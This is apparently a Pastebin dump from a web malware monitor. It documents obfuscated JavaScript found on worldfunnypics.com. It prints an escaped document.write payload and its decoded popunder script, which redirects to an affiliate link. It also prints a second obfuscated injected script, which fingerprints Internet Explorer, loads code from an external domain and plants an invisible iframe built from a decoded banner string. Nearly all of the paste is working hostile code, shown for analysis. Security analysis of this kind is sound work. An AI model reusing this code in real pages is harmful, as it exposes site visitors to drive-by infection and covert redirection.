Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * Quttera web malware monitor detected suspicious obfuscated JavaScript code redirecting user
- * to malicious URL http://worldfunnypics.com/index.php which further inject another malicious
- * JavaScript code and hidden references of other malicious domains.
- */
- /*
- * initial threat dump
- */
- document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44 .... /* 10k characters skipped */ ... %3E%3C%62%6F%64%79%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E%09'));
- /*
- * decoded payload
- */
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
- <script type="text/javascript">
- var puShown = false;
- var PopWidth = 1370;
- var PopHeight = 800;
- var PopFocus = 0;
- var _Top = null;
- function GetWindowHeight() {
- var myHeight = 0;
- if (typeof (_Top.window.innerHeight) == 'number') {
- myHeight = _Top.window.innerHeight;
- } else if (_Top.document.documentElement && _Top.document.documentElement.clientHeight) {
- myHeight = _Top.document.documentElement.clientHeight;
- } else if (_Top.document.body && _Top.document.body.clientHeight) {
- myHeight = _Top.document.body.clientHeight;
- }
- return myHeight;
- }
- function GetWindowWidth() {
- var myWidth = 0;
- if (typeof (_Top.window.innerWidth) == 'number') {
- myWidth = _Top.window.innerWidth;
- } else if (_Top.document.documentElement && _Top.document.documentElement.clientWidth) {
- myWidth = _Top.document.documentElement.clientWidth;
- } else if (_Top.document.body && _Top.document.body.clientWidth) {
- myWidth = _Top.document.body.clientWidth;
- }
- return myWidth;
- }
- function GetWindowTop() {
- return (_Top.window.screenTop != undefined) ? _Top.window.screenTop : _Top.window.screenY;
- }
- function GetWindowLeft() {
- return (_Top.window.screenLeft != undefined) ? _Top.window.screenLeft : _Top.window.screenX;
- }
- function doOpen(url) {
- var popURL = "about:blank"
- var popID = "ad_" + Math.floor(89999999 * Math.random() + 10000000);
- var pxLeft = 0;
- var pxTop = 0;
- pxLeft = (GetWindowLeft() + (GetWindowWidth() / 2) - (PopWidth / 2));
- pxTop = (GetWindowTop() + (GetWindowHeight() / 2) - (PopHeight / 2));
- if (puShown == true) {
- return true;
- }
- var PopWin = _Top.window.open(popURL, popID, 'toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=' + pxTop + ',left=' + pxLeft + ',width=' + PopWidth + ',height=' + PopHeight);
- if (PopWin) {
- puShown = true;
- if (PopFocus == 0) {
- PopWin.blur();
- if (navigator.userAgent.toLowerCase().indexOf("applewebkit") > -1) {
- _Top.window.blur();
- _Top.window.focus();
- }
- }
- PopWin.Init = function (e) {
- with(e) {
- Params = e.Params;
- Main = function () {
- if (typeof window.mozPaintCount != "undefined") {
- var x = window.open("about:blank");
- x.close();
- }
- var popURL = Params.PopURL;
- try {
- opener.window.focus();
- } catch (err) {}
- window.location = popURL;
- }
- Main();
- }
- };
- PopWin.Params = {
- PopURL: url
- }
- PopWin.Init(PopWin);
- }
- return PopWin;
- }
- function setCookie(name, value, time) {
- var expires = new Date();
- expires.setTime(expires.getTime() + time);
- document.cookie = name + '=' + value + '; path=/;' + '; expires=' + expires.toGMTString();
- }
- function getCookie(name) {
- var cookies = document.cookie.toString().split('; ');
- var cookie, c_name, c_value;
- for (var n = 0; n < cookies.length; n++) {
- cookie = cookies[n].split('=');
- c_name = cookie[0];
- c_value = cookie[1];
- if (c_name == name) {
- return c_value;
- }
- }
- return null;
- }
- function initPu() {
- _Top = self;
- if (top != self) {
- try {
- if (top.document.location.toString()) _Top = top;
- } catch (err) {}
- }
- if (document.attachEvent) {
- document.attachEvent('onclick', checkTarget);
- } else if (document.addEventListener) {
- document.addEventListener('click', checkTarget, false);
- }
- }
- function checkTarget(e) {
- if (!getCookie('popundr')) {
- var e = e || window.event;
- var win = doOpen('http://bit.ly/13mOaly');
- setCookie('popundr', 1, 24 * 60 * 60 * 1000);
- }
- }
- setTimeout(function () {
- initPu();
- }, 90000) //-->
- </script>
- </head>
- <body></body>
- </html>
- /*
- * content of http://bit.ly/13mOaly
- */
- <a href="http://hidethis.co/?url=http://www.amazon.com/?&tag=worldfunnypic-20&camp=216797&creative=394541&linkCode=ur1&adid=0EW2CHFN51JXZM4GJ9C1&&ref-refURL=http://worldfunnypics.com/&referer=http://worldfunnypics.com/index.php">moved here</a>
- /*
- * malicious JavaScript injected by visiting http://worldfunnypics.com/index.php
- */
- /* sQB1P5VzfTJR6s34jdD6gslNw6r */
- var jRJV7 = "\x75serid\x4108\x31\x37FB\x32\x35";
- var uVp14M = "28";
- var wkskmqN = 1;
- function BSROd(ThAa1) {
- var Mhw543l;
- var onkuv = document.cookie;
- if (!onkuv) {
- return null;
- }
- onkuv = onkuv.replace(/\s/g, "");
- var jmv85 = onkuv.split(";");
- for (var i = 0; i < jmv85.length; i++) {
- var yVR7o = jmv85[i].split("=");
- if (yVR7o[0] == ThAa1) {
- Mhw543l = unescape(yVR7o[1]);
- break;
- }
- }
- return Mhw543l;
- };
- function bn5wPSP(ThAa1, tjHOR77, dfe6VvH) {
- var exp = new Date();
- var HREqB = exp.getTime() + (dfe6VvH * 60 * 60 * 1000);
- exp.setTime(HREqB);
- var sD8ztEj = ThAa1 + "=" + escape(tjHOR77) + "; e\x78p\x69\x72\x65s=" + exp.toGMTString() + "\x3b d\x6fm\x61i\x6e=" + document.domain;
- document.cookie = sD8ztEj;
- };
- function OR8zbpb() {
- bn5wPSP(jRJV7, uVp14M, 48);
- };
- function UGus0() {
- try {
- if (ad_banner_content_str.length == 0) {
- bn5wPSP(jRJV7, uVp14M, 24);
- return;
- }
- var xpNcRs = unescape(ad_banner_content_str.replace(/[g-zG-Z]+/g, "").replace(/[=\-!@$;.,]+/g, "%"));
- var T7uhy = document.createElement("\x44I\x56");
- T7uhy.style.cssText = "po\x73\x69tion:ab\x73ol\x75t\x65;left\x3a\x30\x70x;t\x6fp:2\x30\x30px;\x6fpa\x63\x69\x74\x79:0\x3bfil\x74er:alpha(o\x70a\x63\x69\x74y=\x30)\x3b";
- T7uhy.innerHTML = "<ifr\x61me \x6fn\x6c\x6fad\x3d\x27O\x52\x38z\x62pb\x28);\x27 \x73r\x63=\x27" + xpNcRs + "'\x20width\x3d19 \x68\x65i\x67ht=1\x39 f\x72\x61\x6deb\x6frde\x72\x3d0 \x73c\x72\x6flli\x6eg=\x27no\x27></\x69\x66rame\x3e";
- document.body.appendChild(T7uhy);
- } catch (e) {}
- };
- function chFUHfD() {
- var OAA9NjP = navigator.userAgent;
- if (OAA9NjP.indexOf("W\x69\x6ed\x6fws") == -1 || OAA9NjP.indexOf("M\x53\x49E") == -1) {
- return 0;
- }
- if (wkskmqN) {
- try {
- if (BSROd(jRJV7) == uVp14M) {
- return false;
- }
- } catch (e) {};
- }
- try {
- var qVgRS = 0;
- if (OAA9NjP.indexOf("\x4d\x53IE") != -1) {
- try {
- qVgRS = sxj7zbe();
- function sxj7zbe() {
- return 0;
- }
- } catch (e) {
- qVgRS = 1;
- }
- }
- if (qVgRS == 0) {
- var yAu0FbO = document.createElement("\x53CR\x49\x50T");
- yAu0FbO.type = "te\x78\x74\x2fj\x61vasc\x72\x69pt";
- yAu0FbO.onreadystatechange = function () {
- if (this.readyState == "l\x6fa\x64\x65d" || this.readyState == "com\x70le\x74\x65") {
- UGus0();
- }
- };
- yAu0FbO.src = "http:\x2f/c\x64\x6e\x2ein\x73p\x69ra\x74ional\x79\x6f\x75\x74ubevideos\x2e\x63om\x2f\x6b";
- document.body.appendChild(yAu0FbO);
- }
- } catch (e) {};
- };
- if (document.addEventListener) {
- document.addEventListener("DOMC\x6f\x6e\x74entL\x6fa\x64\x65d", chFUHfD, false);
- } else {
- document.write("<" + "scri\x70t id\x3d\x27a\x5ay\x55\x49cac\x311\x27 d\x65\x66e\x72\x20src\x3djavascr\x69p\x74:vo\x69\x64\x280\x29>\x3c" + "\/\x73\x63r\x69pt\x3e");
- var script = document.getElementById("\x61\x5ayUIc\x61\x6311");
- script.onreadystatechange = function () {
- if (this.readyState == "\x63o\x6d\x70lete") {
- chFUHfD();
- }
- };
- } /* FUhPrrPetzKkCftQu */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
